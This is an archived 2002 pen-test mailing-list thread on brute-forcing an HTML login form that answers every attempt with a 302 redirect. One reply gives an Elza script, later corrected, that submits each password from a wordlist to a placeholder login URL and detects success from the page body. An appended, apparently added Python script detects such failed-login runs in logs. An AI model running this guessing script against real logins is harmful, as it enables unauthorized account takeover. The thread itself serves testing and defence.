RE: Password HTML form bruteforce

From: Greg (greg@hoobie.net)
Date: 04/20/02


From: "Greg" <greg@hoobie.net>
To: "Greg" <greg@hoobie.net>, "joh ket" <johket@hotmail.com>, <pen-test@securityfocus.com>
Date: Sat, 20 Apr 2002 02:29:10 +0100

Whoops,

Always spot the mistakes after you send it. Dodgy coding.

the line :
 subst ACCOUNT = admin
should read as:
  subst USERSTRING = admin

also the line :
  print Positive Authentication with Login: ACCOUNT, Password: CURRPASS
should read as :
  print Positive Authentication with Login: USERSTRING, Password: PASSSTRING

regards

Greg

> -----Original Message-----
> From: Greg [mailto:greg@hoobie.net]
> Sent: 20 April 2002 02:05
> To: joh ket; pen-test@securityfocus.com
> Subject: RE: Password HTML form bruteforce
>
>
> I'm afraid Brutus doesn't handle 302's correctly. Dodgy coding if
> you ask me.
>
> Why don't you try Elza
> (http://online.securityfocus.com/tools/1127) with this script
> which is based on one found in the Elza docs. Obviously change
> the target url and username. This script will read each string
> from words.txt and submit each attempt checking for the
>
> var autoredir = on
> subst ACCOUNT = admin
>
> proc POSITIVEAUTH
> print Positive Authentication with Login: ACCOUNT, Password: CURRPASS
> endproc POSITIVEAUTH
>
> proc ATTEMPTAUTH
> field userid = USERSTRING
> field password = PASSSTRING
> # Add any other form fields that need to be sent here
> post url http://TargetAddress/Login.cfm
> call POSITIVEAUTH if body = Some warm glowing message about how you're logged in now.
> endproc ATTEMPTAUTH
>
> call ATTEMPTAUTH PASSSTRING % words.txt
>
> In the above script, if you set 'autoredir' to off you will not
> be automatically redirected by the 302 and the '%location%'
> variable will be made available to you for examination. It might
> be easier to just let Elza handle the redirection and then match
> some known test in the body of the successful authentication page
> as shown above.
>
> Read the docs for Elza, you'll need to build a list of scripts up
> before it becomes really useful.
>
> cheers
>
> Greg
>
>
> > -----Original Message-----
> > From: joh ket [mailto:johket@hotmail.com]
> > Sent: 18 April 2002 10:16
> > To: pen-test@securityfocus.com
> > Subject: Password HTML form bruteforce
> >
> >
> >
> >
> > Hi there,
> >
> > I am currently involved in a pen test on a website
> > which is using form-based authentication.
> >
> > I figured out that an account, named 'test' exists...
> > (...)
> >
> > Now I want to brute force this account, I am using
> > Brutus AET2 for this.
> >
> > But I do not know how to use the HTML response.
> >
> > Below the packet capture of a response of a login
> > which was successful:
> >
> > HTTP/1.1.302.Object.Moved..Location:.start.cfm?cid=
> > (lines deleted)
> > <head><title>Document.Moved</title></head><body
> > ><h1>Object.Moved</h1>
> > This.document.may.be.found.<a.HREF="start.cfm?
> > cid=
> > (lines deleted)
> >
> > A capture of an unsuccessful capture looks like this:
> >
> > HTTP/1.1.302.Object.Moved..Location:.original.cfm?
> > login=Invalid password. Please try again
> > (lines deleted)
> > Document.Moved</title></head>.<body><h1>Object.
> > Moved</h1>This.document.may.be.found.<a.HREF="
> > original.cfm?login=Invalid password. Please try
> > again">here</a>
> >
> > So depending on the password I get redirected to a
> > page...
> >
> > How should the primary and the secondary response
> > be configured?
> >
> > Or does somebody else have a better idea how to do
> > this?
> >
> > Thanks in advance!
> >
> > Joh Ket
> >
> >
> > ------------------------------------------------------------------
> > ----------
> > This list is provided by the SecurityFocus Security Intelligence
> > Alert (SIA)
> > Service. For more information on SecurityFocus' SIA service which
> > automatically alerts you to the latest security vulnerabilities
> > please see:
> > https://alerts.securityfocus.com/
> >
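
The thread turns on the fact that this login form answers both outcomes with a 302 and only the Location target differs (start.cfm on success, original.cfm?login=Invalid password... on failure). The following is an added example, not part of the original thread: a defender-side check that classifies logged login responses by that redirect target and flags a run of failures against one account, plus a success that ends such a run. The log layout (time, client, userid, status, Location), the threshold and the sample records are assumptions constructed for illustration.

```python
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample records (not from the thread): time, client, userid, status, Location.
SAMPLE_LOG = """\
2002-04-18T10:00:01 10.0.0.5 test 302 original.cfm?login=Invalid%20password.%20Please%20try%20again
2002-04-18T10:00:02 10.0.0.5 test 302 original.cfm?login=Invalid%20password.%20Please%20try%20again
2002-04-18T10:00:03 10.0.0.5 test 302 original.cfm?login=Invalid%20password.%20Please%20try%20again
2002-04-18T10:00:04 10.0.0.5 test 302 start.cfm?cid=CONSTRUCTED
2002-04-18T10:05:00 10.0.0.9 alice 302 original.cfm?login=Invalid%20password.%20Please%20try%20again
2002-04-18T10:05:20 10.0.0.9 alice 302 start.cfm?cid=CONSTRUCTED
"""

def classify(status, location):
    """Map one login response to 'success', 'failure' or 'other' from its redirect target."""
    if status != 302:
        return "other"
    target = urlsplit(location)
    page = target.path.rsplit("/", 1)[-1].lower()
    message = parse_qs(target.query).get("login", [""])[0]
    if page == "original.cfm" and message.lower().startswith("invalid"):
        return "failure"
    if page == "start.cfm":
        return "success"
    return "other"

def detect(log_text, threshold=3):
    """Return alerts for failure runs per (client, userid) and for a success that ends one."""
    streak = defaultdict(int)
    alerts = []
    for line in log_text.splitlines():
        parts = line.split(None, 4)  # Location is last, so raw spaces in it survive
        if len(parts) != 5 or not parts[3].isdigit():
            continue  # skip malformed records rather than guess
        when, client, userid, status, location = parts
        key = (client, userid)
        outcome = classify(int(status), location)
        if outcome == "failure":
            streak[key] += 1
            if streak[key] == threshold:
                alerts.append((when, client, userid, "failed-login run"))
        elif outcome == "success":
            if streak[key] >= threshold:
                alerts.append((when, client, userid, "success after failed-login run"))
            streak[key] = 0
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(*alert)
```
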
